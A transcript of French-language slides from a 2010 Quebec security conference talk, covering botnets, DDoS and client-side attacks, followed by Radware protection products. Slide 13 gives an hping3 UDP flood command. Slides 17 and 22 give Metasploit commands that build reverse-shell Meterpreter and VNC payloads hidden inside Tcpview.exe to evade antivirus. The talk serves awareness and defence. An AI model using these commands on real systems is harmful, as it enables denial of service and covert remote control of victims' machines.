maitriser l'art du kung fu cqsi2010
TRANSCRIPT
![Page 1: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/1.jpg)
Maîtriser l’art du Kung-Fu
19 octobre 2010
Colloque québécois de la sécurité de l'information(CQSI)
Michel Cusin, Architechte Sécurité BellJocelyn Rainville, SE Radware
![Page 2: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/2.jpg)
Slide 2
Agenda
• Maîtriser l’art du Kung-Fu ???
• Server-side Attacks “Attaques traditionnelles”
• Client-side Attacks “Nouvelle tendance”
• Démonstrations
• Conséquences
• Solutions
![Page 3: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/3.jpg)
Slide 3
Kung-Fu
Slide 3
• Kung-Fu qui signifie art martial, vient de la nécessité de légitime défense.
• Les termes "Kung" et "Fu" traduits littéralement et séparément ont une signification différente:
• "Kung" désigne la "maîtrise", le "perfectionnement".
• "Fu" désigne les techniques en tant que contenu.
Comment se porte votre Kung-Fu en sécurité ?
• Kung-Fu en sécurité -> Maîtrise des techniques en sécurité.
Mais qu’est-ce que le Kung-Fu?
![Page 4: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/4.jpg)
Slide 4
Samouraï vs Ninja
vs
Samouraï Ninja
![Page 5: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/5.jpg)
Slide 5
Samouraï vs Ninja
Qu’ont-ils en communs?
Ils maîtrisent leur art…
• Ils maîtrisent leurs techniques.
• Ils maîtrisent leurs armes.
• Ils maîtrisent leurs spécialités.
• Ils défendent ce en quoi ils croient.
![Page 6: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/6.jpg)
Slide 6
Professionnels de la sécurité vs Pirates
vs
(Samouraï) (Ninja)
![Page 7: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/7.jpg)
Slide 7
Qu’avons-nous en communs?
• Maîtrise des techniques
• Utilisation des outils
• Connaissances
• Objectifs
Maîtrisons-nous notre art ?
Professionnels de la sécurité vs Pirates
![Page 8: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/8.jpg)
Slide 8
Server-side Attacks
Server-side Attacks “Attaques traditionnelles”
![Page 9: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/9.jpg)
Slide 9
Qu’est-ce qu’un Botnet
Bot
Bot
BotC&C
Bot
Pirate
Victime
![Page 10: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/10.jpg)
Slide 10
Botnet à louer (IMDDOS)
• Botnet « commercial »
•10 000 nouvelles victime par jour
• Propagation (peer-to-peer)• Windows 7 crack• Autres noms attrayants
• Portail « libre-service »
• Support 7/24
• Made in China
Source: http://www.damballa.com/IMDDOS/
![Page 11: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/11.jpg)
Slide 11
Les Botnets: Le Québec n’y échappe pas
Botnet: RTSS (Réseau de Télécommunication Sociaux Sanitaire)
• Le bot de la St-Valentin (14 Février 2007)• Le bot était transporté par un ver• Réseau paralysé• Au moins l’auteur s’est excusé…
Botnet: Opération Basique
• Février 2008• Plus de 100 pays sont touchés, sur tous les continents. • 17 arrestations (de 17 à 26 ans dont 3 mineurs)• Débût de l’enquête: Été 2006 Source: http://www.sq.gouv.qc.ca/salle-de-presse/communiques/demantelement-reseau-pirates-informatiques-2008.jsp
![Page 12: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/12.jpg)
Slide 12
Qu’est-ce qu’un DDoS
DDoS: Distributed Denial of Service
(Déni de service distribué)
![Page 13: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/13.jpg)
Slide 13
Démonstration DDoS
Simulation d’un DDoS(Avec une seule machine)
Hping3 –udp –flood –rand-source -p 80 [IP Serveur Web]
Defense Pro
![Page 14: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/14.jpg)
Slide 14
L’envers de la médaille…
![Page 15: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/15.jpg)
Slide 15
“Client-side attacks”
Client-side Attacks: La nouvelle tendance
![Page 16: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/16.jpg)
Slide 16
Création d’un “Client-side attacks”
Metasploit Social Engineer Toolkit (SET)
Ultimate EXE Packer (UPX)
![Page 17: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/17.jpg)
Slide 17
Metasploit
Le “framework” Metasploit est un outil pour le développement et l'exécution d'exploits contre une machine distante.
VNCINJECT:./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
Meterpreter:./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
![Page 18: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/18.jpg)
Slide 18
VirusTotal
Plus de 40 antivirus différents…
![Page 19: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/19.jpg)
Slide 19
Camouflage du “malware”
Le Ninja maîtrise l’art du camoufflage…
![Page 20: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/20.jpg)
Slide 20
Attention!
![Page 21: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/21.jpg)
Slide 21
Posez-vous la question
~300
Vulnérabilités découvertes et documentés au cours des 3 dernières années:
~90
~200
Sources: http://nvd.nist.gov/ et http://osvdb.org/
Est-ce que votre stratégie de mise à jour inclue ces produits? Vraiment…?
![Page 22: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/22.jpg)
Slide 22
Scénario d’un “client-side attack”
Connexion en sortie:
Port TCP 80 (HTTP) ou 443 (HTTPS)
DefensePro
Serveur
Victime
Coupe-feuPirate
Environnement corporatif
VNCINJECT:./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
![Page 23: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/23.jpg)
IPS: Protection par signatures statiques
• Procure une protection contre:
– Vers, Bots, Trojans, Hameçonage, logiciels espions
– Web, courriel, SQL, VoIP (SIP), vulnérabilités DNS
– Proxy anonymiseur, attaques IPv6
– Vulnérabilités Microsoft– Anomalies de protocol
• Protection par signatures:
– Équipe de pointe de recherche en sécurité
– Protection contre l’exploitation des vulnérabilités connues
– Mise à jour hebdomadaire et d’urgence des signatures
Slide 23
![Page 24: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/24.jpg)
Protection DDoS : Signatures en temps réel
• Protection par signature créées automatiquement en temps réel contre les attaques DDoS réseau:– SYN floods;
– TCP floods;
– UDP/ICMP floods.
• Proposition de valeur– Maintiens de la disponibilité des applications critiques, même durant les
attaques;
– Blocage des attaques sans bloquer le trafic des utilisateurs légitimes;– Protection automatique en temps réel contre les inondations réseau (floods)
sans nécessiter d'intervention humaine.
Slide 24
![Page 25: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/25.jpg)
Network Behavioral Analysis: Real-time Signatures Protection
• L’Analyse Comportementale Réseau (NBA - Network behavioral analysis) détecte les transactions anormales au niveau des utilisateurs ainsi que des applications.
• Protection par signatures automatiques en temps réel contre:– Propagation de logiciel malveillant “Zéro-minute”
– Mauvaise utilisation des ressources d’applications comme:• Attaques de type “Brute force”• Balayages d’application Web• Inondations (floods) de page HTTP• Balayages SIP• Inondations (flood) SIP
• Proposition de valeur– Maintiens de la disponibilité des applications critiques, même durant les
attaques;
– Blocage des attaques sans bloquer le trafic des utilisateurs légitimes;– Protection automatique en temps réel contre les inondations réseau (floods)
sans nécessiter d'intervention humaine.
Slide 25
![Page 26: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/26.jpg)
Slide 26
Une question d’équilibre
Conclusion
C’est une question d’équilibre
ConnaissancesTechnologies
![Page 27: Maitriser l'art du kung fu cqsi2010](https://reader034.vdocuments.us/reader034/viewer/2022042518/5560b355d8b42afe3b8b47de/html5/thumbnails/27.jpg)
Slide 27
Questions?
La présentation sera disponible sur le site du CQSI ainsi que sur http://cusin.ca
Questions?
Coupon pour le tirage d’une formation SANS gratuite en français:
Détection de pirates informatiques pour administrateurs de systèmes
Info sur http://www.sans.org et sur http://cusin.ca